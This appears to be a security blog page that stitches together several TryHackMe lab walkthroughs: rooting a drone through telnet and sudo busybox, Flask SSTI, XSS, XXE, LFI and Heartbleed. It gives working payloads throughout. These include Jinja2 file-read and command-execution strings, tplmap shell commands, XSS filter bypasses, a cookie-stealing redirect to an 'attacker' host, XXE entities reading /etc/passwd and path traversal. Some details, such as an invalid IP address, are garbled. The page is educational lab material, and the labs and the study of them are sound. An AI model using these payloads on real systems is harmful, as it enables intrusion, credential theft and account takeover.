STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

The communication with the drone happens over UDP, which is short for User Datagram Protocol. UDP is one of the dominant transport-layer protocols in use today. The other is TCP.

1 Enumeration:
2 Exploitation:
3 Privilege Escalation:

Bebop is a quick box that exemplifies exactly how insecure some drone operating systems are. This box shouldn’t take very long to root — it’s really not particularly challenging (which is slightly worrying given it’s based off real drone software). Of much more interest is the overarching concept: drone hacking. If you haven’t already watched the video embedded into the THM room, I would highly recommend it; it’s really interesting (and hilarious in places). I’ll include an embed of the video below, before properly beginning the write-up: TryHackMe bebop Drone Hacking

Enumeration with the Nmap:

As per normal, the first thing we’re going to do with this box is run an nmap scan. A basic service scan is more than enough for our purposes:

nmap -A -sC -sV -T4 -Pn -p- 10.10.86.14

We could also have used the -O switch to try and identify the operating system (which you’re welcome to try), but for me, nmap fails to identify it.

As it is, from the two ports that are open we can make a pretty solid guess that the OS is FreeBSD. Let’s wait a bit before confirming that though.

We have two ports open here: port 22 (SSH) and port 23 (telnet). These two services do essentially the same thing (giving you the ability to remotely access a command line on the machine), but SSH is significantly more secure; so, funnily enough, we’re trying telnet first.

#1 What is the User Flag?

Exploitation:

At the start of the room we’re given a codename: pilot. Let’s try logging in with that:

telnet -l pilot <remote-ip>

OR

telnet IP

#2 What is the Root Flag?

Privilege Escalation:

Pretty much the first thing you usually do when aiming for privesc on a Linux computer is look to see what you can run as sudo (i.e. with Root/Administrator privileges). FreeBSD is no different. Run sudo -l and see if we can run anything as root:

sudo -l

We can run BusyBox as root. In case you haven’t come across it before, BusyBox essentially amalgamates lots of different functions into a single executable file. It’s often used in embedded systems to reduce the disk space and memory required. Let’s have a look to see which commands we can execute through BusyBox on this system:

busybox

sh is in the defined functions listsh in defined functions list

We can run sh through BusyBox. sh will give us a shell, meaning that if we run BusyBox as root (which we can do with our sudo permissions), we get a root shell!

sudo /usr/local/bin/busybox sh

whoami

cat root.txt

OR

exit

And there we have it. We got root on a drone!

busybox cat /root/root.txt

And there we have it. We got root on a drone!

Quiz Time

#1 What is the low privilleged user?

ls -l

Ans :- pilot

#2 What binary was used to escalate privillages?

Ans :- busybox

#3 What service was used to gain an initial shell?

Ans :- telnet

#4 What Operating System does the drone run?

uname -a

Ans :- FreeBSD

All too soon, that’s us completed Bebop — our drone-hacking extravaganza draws to a close. Kinda scary how easy some of our eyes in the sky are to hack.

Video Tutorial :- Soon...

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

- Hacking Truth by Kumar Atul Jaiswal

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

[Task 1] Introduction

There are quite a lot of vulnerabilities that affect web applications. This leads to the problem of having quite a bit of material to cover, so it's fair to only cover the bigger/more common vulnerabilities in lieu of the smaller/less common vulnerabilities. This room is dedicated to some of the smaller web vulnerabilities, that may not be large enough to get a room on this site but are still worth knowing about. TryHackMe Server side template injection

The vulnerabilities that will be discussed are:

SSTI

Task 2] Methodology

This room will be divided into sections, each section talking about a specific vulnerability. The sections will follow this format: an introduction on what the vulnerable thing is, what the vulnerability(s) is/are(their may be multiple tasks on this), a guided exploitation in which I show pictures of how it's exploited, and finally a virtual machine where you will be asked to exploit it and collect a flag.

Since this room is divided into sections that don't follow one another, you can do this room in any order you please.

[Task 3] [Section 1 - SSTI] - What is SSTI

A template engine allows developers to use static HTML pages with dynamic elements. Take for instance a static profile.html page, a template engine would allow a developer to set a username parameter, that would always be set to the current user's username

Server Side Template Injection, is when a user is able to pass in a parameter that can control the template engine that is running on the server.

For example take the code

[Task 4] [Section 1 - SSTI] - Manual exploitation of SSTI.

Turning the code earlier into a full flask application, gives us this page. It takes a prompt for a name, and then returns Hello <name>!.

Fortunately, we don't have to do much recon as we already know this is vulnerable to SSTI, lets try injecting some basic template code

Boom! That's template injection. We can use the wonderful repository PayloadsAllTheThings, to find some payloads for flask's template engine. The repo says we can use the code

{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}} to read files on the server. Effectively all that payload does is load the file object in python, from there we can use basic file operations. Let's try to read /etc/passwd using this method

We have LFI! Unfortunately(or fortunately depending on how you view it), that is not the extent of this vulnerability. The same repo, also includes a payload for remote code execution.

We can use the code

{{config.__class__.__init__.__globals__['os'].popen(<command>).read()}} to execute commands on the server. All that payload does is import the os module, and run a command using the popen method.

From there, an attacker has already won, they can use this ability to gain a shell on the server.

#1 How would a hacker(you :) ) cat out /etc/passwd on the server(using cat with the rce payload)

Ans :- {{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}

#2 What about reading in the contents of the user test's private ssh key.(use the read file one not the rce one)

Ans :- {{ ''.__class__.__mro__[2].__subclasses__()[40]()(/home/test/.ssh/id_rsa).read()}}

[Task 5] [Section 1 - SSTI]: Automatic Exploitation of SSTI

Fortunately, we don't have to go searching for payloads to see how we can use SSTI to our advantage, because there is a tool known as Tplmap that does that for us! The tool can be found here.

Note: use python2 to install the requirements. python2 -m pip

The basic syntax for tplmap is different depending on whether you're using get or post

GET tplmap -u <url>/?<vulnparam>
POST tplmap -u <url> -d '<vulnparam>'

Since our code operates via a form, the post syntax will be used.

From there we can effectively do everything we did in the manual exploitation task, from a command line. Let's try running id using tplmap.

#1 How would I cat out /etc/passwd using tplmap on the ip:port combo 10.10.10.10:5000, with the vulnerable param "noot".

Ans :- tplmap -u http://10.10.10.10.5000/ -d 'noot' --os-cmd ' cat /etc/passwd'

[Task 6][Section 1 - SSTI]: Challenge

I've created a vulnerable machine for you to test your SSTI skills on! I've placed a flag in /flag aswell, good luck and have fun!

# What is the flag?

Hint - ./tplmap.py -u http://10.10.314.20/ -d 'name' --os-shell

Ans :- cooctus

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

- Hacking Truth by Kumar Atul Jaiswal

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

[Task 1] Introduction

Cross-site scripting (XSS) is a security vulnerability typically found in web applications. Its a type of injection which can allow an attacker to execute malicious scripts and have it execute on a victims machine.

A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS. TryHackMe Cross Site Scripting - A Walkthrough by Kumar Atul Jaiswal

The extent to the severity of this vulnerability depends on the type of XSS, which is normally split into two categories: persistent/stored and reflected. Depending on which, the following attacks are possible:

Cookie Stealing - Stealing your cookie from an authenticated session, allowing an attacker to login as you without themselves having to provide authentication.
Keylogging - An attacker can register a keyboard event listener and send all of your keystrokes to their own server.
Webcam snapshot - Using HTML5 capabilities its possible to even take snapshots from a compromised computer webcam.
Phishing - An attacker could either insert fake login forms into the page, or have you redirected to a clone of a site tricking you into revealing your sensitive data.
Port Scanning - You read that correctly. You can use stored XSS to scan an internal network and identify other hosts on their network.
Other browser based exploits - There are millions of possibilities with XSS.

Who knew this was all possible by just visiting a web-page. There are measures put in place to prevent this from happening by your browser and anti-virus.

This room will explain the different types of cross-Site scripting, attacks and require you to solve challenges along the way.

This room is for educational purposes only, carrying out attacks explained in this room without permission from the target is illegal. I take no responsibility for your actions, you need to learn how an attacker can exploit this vulnerability in order to ensure you're patching it properly.

[Task 2] Deploy your XSS Playground

Attached to this task is a machine used for all questions in this room. Every task in this room has an page on the XSS Playground site, which includes a more in-depth explanation of the vulnerability in question and supporting challenges.

[Task 3] Stored XSS

Stored cross-site scripting is the most dangerous type of XSS. This is where a malicious string originates from the websites database. This often happens when a website allows user input that is not sanitised (remove the "bad parts" of a users input) when inserted into the database.

An example

A attacker creates a payload in a field when signing up to a website that is stored in the websites database. If the website doesn't properly sanitise that field, when the site displays that field on the page, it will execute the payload to everyone who visits it.

The payload could be as simple as <script>alert(1)</script>

However, this payload wont just execute in your browser but any other browsers that display the malicious data inserted into the database.

Lets experiment exploiting this type of XSS. navigate to the "Stored-XSS" page on the XSS playground.

#1 The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine.

#2 Add a comment and see if you can insert some of your own HTML.

Doing so will reveal the answer to this question.

Payload :- <p>HEY, it's HTML!!</p>

Ans :- HTML_T4gs

#3 Create an alert popup box appear on the page with your document cookies.

Payload :- <script>alert(document.cookie)</script>

Ans :- W3LL_D0N3_LVL2

#4 Change "XSS Playground" to "I am a hacker" by adding comments and using Javascript.

Payload :- <script>document.getElementById('thm-title').innerHTML="I am a hacker"</script>

Ans :- websites_can_be_easily_defaced_with_xss

#5 Stored XSS can be used to steal a victims cookie (data on a machine that authenticates a user to a webserver). This can be done by having a victims browser parse the following Javascript code:

<script>window.location='http://attacker/?cookie='+document.cookie</script>

This script navigates the users browser to a different URL, this new request will includes a victims cookie as a query parameter. When the attacker has acquired the cookie, they can use it to impersonate the victim.

Take over Jack's account by stealing his cookie, what was his cookie value?

Payload :- <img src="javascript:'/log/' + document.cookie" />

Ans :- s%3Aat0YYHmITnfNSF0kM5Ne-ir1skTX3aEU.yj1%2FXoaxe7cCjUYmfgQpW3o5wP3O8Ae7YNHnHPJIasE

#6 Post a comment as Jack.

ANs :- c00ki3_stealing

[Task 4] Reflected XSS

In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.

This might seem harmless as it requires the victim to send a request containing an attackers payload, and a user wouldn't attack themselves. However, attackers could trick the user into clicking their crafted link that contains their payload via social-engineering them via email..

Reflected XSS is the most common type of XSS attack.

An example

An attacker crafts a URL containing a malicious payload and sends it to the victim. The victim is tricked by the attacker into clicking the URL. The request could be http://example.com/search?keyword=<script>...</script>

The website then includes this malicious payload from the request in the response to the user. The victims browser will execute the payload inside the response. The data the script gathered is then sent back to the attacker (it might not necessarily be sent from the victim, but to another website where the attacker then gathers this data - this protects the attacker from directly receiving the victims data).

#1 Craft a reflected XSS payload that will cause a popup saying "Hello"

Payload :- <script>alert("Hello")</script>

Ans :- ThereIsMoreToXSSThanYouThink

#2 Craft a reflected XSS payload that will cause a popup with your machines IP address.

Payload :- <script>alert(window.location.hostname)</script>

Ans :- ReflectiveXss4TheWin

[Task 5] DOM-Based XSS

What is the DOM

In a DOM-based XSS attack, a malicious payload is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. So what does this mean?

With reflective xss, an attackers payload will be injected directly on the website and will not matter when other Javascript on the site gets loaded.

<html>
You searched for <em><script>...</script></em>
</html

With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:

var keyword = document.querySelector('#search')
keyword.innerHTML = <script>...</script>

#1 Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.

The hint gives us something to try out.

test" onmouseover="alert('Hover over the image and inspect the image element')

What this is doing is applying test to the src attribute of the image tag, and closing that quote. Then it is starting an onmouseover event attribute. When we do this and mouse over the broken image, then we see the alert.

Let's modify it and make it do what the task is asking for (document.cookie instead of that string):

xxx" onmouseover="alert(document.cookie)

That should give us the desired result. We could have chosen a number of different events rather than onmouseover. I personally prefer onerror for this example. Give it a try!

Ans :- BreakingAnElementsTag

#2 Create an onhover event on an image tag, that change the background color of the website to red

Almost the same deal here, except we are supposed to try using onhover instead, and change some property of the page instead of just displaying a popup.

xxx" onhover="document.body.style.backgroundColor='red'

You might have to play around with this one, it's a bit buggy for me. I had to end up doing it with an onmouseover I think. Play around and you'll eventually get it.

Ans :- JavaScriptIsAwesome

[Task 6] Using XSS for IP and Port Scanning

Cross-site scripting can be used for all sorts of mischief, one being the ability to scan a victims internal network and look for open ports. If an attacker is interested in what other devices are connected on the network, they can use Javascript to make requests to a range of IP addresses and determine which one responds.

On the XSS Playground, go to the IP/Port scanning tab and review a script to scan the internal network.

[Task 7] XSS Keylogger

Javascript can be used for many things, including creating an event to listen for key-presses.

Navigate to the "Key Logger" part of the XSS playground and complete the challenge.

[Task 8] Filter Evasion

There are many techniques used to filter malicious payloads that are used with cross-site scripting. It will be your job to bypass 4 commonly used filters.

Navigate to "Filter Evasion" in the XSS Playground to get started.

Cross-site scripting are extremely common. Below are a few reports of XSS found in massive applications; you can get paid very well for finding and reporting these vulnerabilities.

    XSS found in Shopify
    $7,500 for XSS found in Steam chat
    $2,500 for XSS in HackerOne
    XSS found in Instagram

#1 Bypass the filter that removes any script tags.

Payload :- <img src="blah" onerror=alert("Hello") />

Ans :- 3c3cf8d90aaece81710ab9db759352c0

#2 The word alert is filtered, bypass it.

Payload :- <img src="blah" onerror=confirm("Hello") />

Ans :- a2e5ef66f5ff584a01d734ef5edaae91

#3 The word hello is filtered, bypass it.

Payload :- <img src="blah" onerror=alert("HHelloello") />

Ans :- decba45d0eff17c6eedf1629393bee1d

#4 Filtered in challenge 4 is as follows:

    word "Hello"
    script
    onerror
    onsubmit
    onload
    onmouseover
    onfocus
    onmouseout
    onkeypress
    onchange

Now it get's easier once we understand what this code is looking for! For this one, we just have to realize that the filter code sees onerror, but ignores ONERROR, which is still valid for our purposes.

<img src="blah" ONERROR="alert('HHelloello')" />

I'll let you in on a secret. This section is all being evaluated by POSTing values for question and answer to /filter-evasion-check. If you simply POST question=1&answer=Hello to /filter-evasion-check, you can fool the server-side code into returning the valid answer flag.

POST question=1&answer=Hello
POST question=2&answer=prompt
POST question=4&answer=Hello
POST question=4&answer=Hello

Ans :- 2482d2e8939fc85a9363617782270555

[Task 9] Protection Methods & Other Exploits

Protection Methods

There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.

Escaping - Escape all user input. This means any data your application has received is secure before rendering it for your end users. By escaping user input, key characters in the data received bu the web age will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.

Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.

Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity <

Other Exploits

XSS is often overlooked but can have just as much impact as other big impact vulnerabilities. More often than not, its about stringing several vulnerabilities together to produce a bigger/better exploit. Below are some other interesting XSS related tools and websites.

XSS-Payloads.com is a website that has XSS related Payloads, Tools, Documentation and more. You can download XSS payloads that take snapshots from a webcam or even get a more capable port and network scanner.

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

- Hacking Truth by Kumar Atul Jaiswal

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

[Task 1] Deploy the VM

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution. TryHackMe XXE walkthrough XML Extensible Entity

There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
1) An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.

2) out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.

[Task 2] eXtensible Markup Language

Before we move on to learn about XXE exploitation we'll have to understand XML properly.

What is XML?

XML (eXtensible Markup Language) is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is a markup language used for storing and transporting data.

Why we use XML?

1. XML is platform-independent and programming language independent, thus it can be used on any system and supports the technology change when that happens.

2. The data stored and transported using XML can be changed at any point in time without affecting the data presentation.

3. XML allows validation using DTD and Schema. This validation ensures that the XML document is free from any syntax error.

4. XML simplifies data sharing between various systems because of its platform-independent nature. XML data doesn’t require any conversion when transferred between different systems.

Syntax

Every XML document mostly starts with what is known as XML Prolog.

<?xml version="1.0" encoding="UTF-8"?>

Above the line is called XML prolog and it specifies the XML version and the encoding used in the XML document. This line is not compulsory to use but it is considered a `good practice` to put that line in all your XML documents.

Every XML document must contain a `ROOT` element.

Ex:

<?xml version="1.0" encoding="UTF-8"?>
<mail>
   <to>falcon</to>
   <from>feast</from>
   <subject>About XXE</subject>
   <text>Teach about XXE</text>
</mail>

In the above example the <mail> is the ROOT element of that document and <to>, <from>, <subject>, <text> are the children elements. If the XML document doesn't have any root element then it would be consideredwrong or invalid XML doc.

Another thing to remember is that XML is a case sensitive language. If a tag starts like <to> then it has to end by </to> and not by something like </To>(notice the capitalization of T)

Like HTML we can use attributes in XML too. The syntax for having attributes is also very similar to HTML.

Ex: <text category = "message">You need to learn about XXE</text>

In the above example category is the attribute name and message is the attribute value.

#1 Full form of XML

Ans :- Extensible Markup Language

#2 Is XML case sensitive?

Ans :- yes


#3 Is it compulsory to have XML prolog in XML documents?

Ans :- no

#4 Can we validate XML documents against so schema?

Ans :- yes

#5 How can we specify XML version and encoding in XML document?

Ans :- XML Prolog

[Task 3] DTD

Before we move on to start learning about XXE we'll have to understand what is DTD in XML.

DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document.

Let us try to understand this with the help of an example. Say we have a file named note.dtd with the following content:

<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>

Now we can use this DTD to validate the information of some XML document and make sure that the XML file conforms to the rules of that DTD.

Ex: Below is given an XML document that uses note.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
    <to>falcon</to>
    <from>feast</from>
    <heading>hacking</heading>
    <body>XXE attack</body>
</note>

So now let's understand how that DTD validates the XML. Here's what all those terms used in note.dtd mean

!DOCTYPE note - Defines a root element of the document named note
!ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"
!ELEMENT to - Defines the to element to be of type "#PCDATA"
!ELEMENT from - Defines the from element to be of type "#PCDATA"
!ELEMENT heading - Defines the heading element to be of type "#PCDATA"
!ELEMENT body - Defines the body element to be of type "#PCDATA"
NOTE: #PCDATA means parseable character data.

#1 With what extension do you save a DTD file?

Ans :- DTD

#2 How do you define a new ELEMENT?

Ans :- !ELEMENT

#3 How do you define a ROOT element?

Ans :- !DOCTYPE

#4 How do you define a new ENTITY?

Ans :- !ENTITY

[Task 4] XXE payload

Now we'll see some XXE payload and see how they are working.

1) The first payload we'll see is very simple. If you've read the previous task properly then you'll understand this payload very easily.

<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>

As we can see we are defining a ENTITY called name and assigning it a value feast. Later we are using that ENTITY in our code.

2) We can also use XXE to read some file from the system by defining an ENTITY and having it use the SYSTEM keyword

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

Here again, we are defining an ENTITY with the name read but the difference is that we are setting it value to `SYSTEM` and path of the file.

If we use this payload then a website vulnerable to XXE(normally) would display the content of the file /etc/passwd.

In a similar manner, we can use this kind of payload to read other files but a lot of times you can fail to read files in this manner or the reason for failure could be the file you are trying to read.

[Task 5] Exploiting

Now let us see some payloads in action. The payload that I'll be using is the one we saw in the previous task.

1) Let's see how the website would look if we'll try to use the payload for displaying the name.

On the left side, we can see the burp request that was sent with the URL encoded payload and on the right side we can see that the payload was able to successfully display name falcon feast

2) Now let's try to read the /etc/passwd

#1 Try to display your own name using any payload.

#2 See if you can read the /etc/passwd

#3 What is the name of the user in /etc/passwd

Ans :- falcon

#4 Where is falcon's SSH key located?

#5 What are the first 18 characters for falcon's private key

Ans :- MIIEogIBAAKCAQEA7

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

- Hacking Truth by Kumar Atul Jaiswal

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

[Task 1] Deploy

Local File Inclusion (LFI) is the vulnerability that is mostly found in web servers. This vulnerability is exploited when a user input contains a certain path to the file which might be present on the server and will be included in the output. This kind of vulnerability can be used to read files containing sensitive and confidential data from the vulnerable system. TryHackMe LFi walkthrough Local file inclusion

The main cause of this type of Vulnerability is improper sanitization of the user's input. Sanitization here means that whatever user input should be checked and it should be made sure that only the expected values are passed and nothing suspicious is given in input. It is a type of Vulnerability commonly found in PHP based websites but isn't restricted to them.

[Task 2] Getting user access via LFI

To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is hackingtruth.in then a parameter in the URL can look like https://www.hackingtruth.in/?file=robots.txt. Here file is the name of the parameter and robots.txt is the value that we are passing (include the file robots.txt).

Importance of Arbitrary file reading

A lot of the time LFI can lead to accessing (without the proper permissions) important and classified data. An attacker can use LFI to read files from your system which can give away sensitive information such as passwords/SSH keys; enumerated data can be further used to compromise the system.

In this task, we are going to find the parameter which is vulnerable to the Local File Inclusion attack. We will then will try to leverage information obtained to get access to the system.

#1 Look around the website. What is the name of the parameter you found on the website?

Ans :- page

#2 Once we find the vulnerable parameter we can try to include the passwd file on the Linux system i.e /etc/passwd. The most common technique is path traversal method meaning we can include files like ../../../../etc/passwd what this does it get out of a directory like we usually do in Linux system by running cd ../

../../etc/passwd means to go out twice from the current working directory and then go to /etc directory and read the passwd file. Now the issue with this method is you need to be sure about the path of the file.

You can read the interesting files to check out while testing for LFI :- Click here

#3 Once you include /etc/passwd then you should see entries something like:

root:x:0:0::/root:/bin/bash
bin:x:1:1::/:/sbin/nologin
daemon:x:2:2::/:/sbin/nologin

To understand all those entries read this article.

This file can give information about the system like the name of all the existing users on the system.

#4 What is the name of the user on the system?

Ans :- falcon

#5 Once you find the name of the user it's important to see if you can include anything common and important in that user's directory, could be anything like theirs .bashrc etc

#6 Name of the file which can give you access to falcon's account on the system?

Ans :- id_rsa

#7 What is the user flag?

Ans :- B8LEGIF049JT4RTVWUG4

[Task 3] Escalating your privileges to root

In this, we are going to focus on getting root-level access on the machine. This step is also known as Privilege escalation; we are going to escalate our privilege from a normal user to a root user (with the highest level of system privileges).

First, we'll have to find a vector that would be exploited to give us root access. A vector can be anything like a binary with some special permission or a cronjob that is not configured properly etc.

I've written a blog post about Linux privilege escalation, you can read it here to know more about it.

#1 What can falcon run as root?

Ans :- /bin/journalctl

#2 Search gtfobins via the website or by using gtfo tool, to see if you find any way to use that binary for privilege escalation.

#3 What is the root flag?

Ans :- H1EQRK5XEX140H2KMO08

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

- Hacking Truth by Kumar Atul Jaiswal

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

SSL issues are still lurking in the wild. Can you exploit this web servers OpenSSL?

Introduction to Heartbleed and SSL/TLS

On the internet today, most web servers are configured to use SSL/TLS. SSL(secure socket layer) is just a predecessor to TLS(transport layer security). The most common versions are TLS 1.2 and TLS 1.3(which has recently been released). Configuring a web server to use TLS means that all communication from that particular server to a client will be encrypted; any malicious third party that has access to this traffic will not be able to understand/decrypt the traffic, and they also will not be able to modify the traffic. To learn more about how the TLS connections are established, check 1.2 and 1.3 out.

Heartbleed is a bug due to the implementation in the OpenSSL library from versions 1.0.1 to 1.0.1f(which is very widely used). It allows a user to access memory on the server(which they usually wouldn't have access to). This in turn allows a malicious user to access different kinds of information(that they wouldn't usually have access to due to the encryption and integrity provided by TLS) including:

server private key

confidential data like usernames, passwords and other personal information

Analysing the Bug

The implementation error occurs in the heartbeat message that is used by OpenSSL to keep a connection alive even when no data is sent. A mechanism like this is important because if a connection dies/resets quite often, it would be expensive to set up the TLS aspect of the connection again; this affects the latency across the internet and it would make using services slow for users. A heartbeat message sent by one end of the connection contains random data and the length of the data, and this exact data is sent back when received by the other end of the connection. When the server retrieves this message from the client here's what it does: TryHackMe HeartBleed Bug Walkthrough

The server constructs a pointer(memory location) to the heartbeat record

It then copies the length of the data sent by a user into a variable(called payload)

The length of this data is unchecked

The server then allocates memory in the form of:

1 + 2 + payload + padding(this can be maximum of 1 + 2 + 65535 + 16)

The server then creates another pointer(bp) to access this memory

The server then copies payload number of bytes from data sent by the user to the bp pointer

The server sends the data contained in the bp pointers to the user

With this, you can see that the user controls the amount and length of data they send over. If the user does not send over any data(where the length is 0), it means that the server will copy arbitrary memory into the new pointer(which is how it can access secret information on the server). When retrieving data this way, the data can be different with different responses as the memory on the server will change.

Remediation

To ensure that arbitrary data from the server isn’t copied and sent to a user, the server needs to check the length of the heartbeat message:

The server needs to check that the length of the heartbeat message sent by the user isn’t 0

The server needs to check the the length doesn’t exceed the specified length of the variable that holds the data

References:

Heartbleed Bug Discovery

The Heartbleed bug was uncovered by a group of security engineers from Codenomicon and Neel Mehta from Google Security. ... This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet.

Note :- Almost website Effect :- 5 Lakh+

Date discovered: April 1, 2014; 6 years ago
Affected software: OpenSSL (1.0.1)
Date patched: April 7, 2014; 6 years ago

Protecting Data In Transit

In this task, you need to obtain a flag using a very well known vulnerability. Make sure you pay attention to all the information and errors displayed. Pay particular attention to how web servers are configured.

Once the machine is deployed, let's go ahead and scan it with nmap

nmap -A -sC -sV -Pn 34.244.41.119

Looks like the machine is hosting a website and it's not properly patched, let's go ahead and see if there's a metasploit module for this

Looks like there is! Let's go ahead and select it for use and check what options we have to set
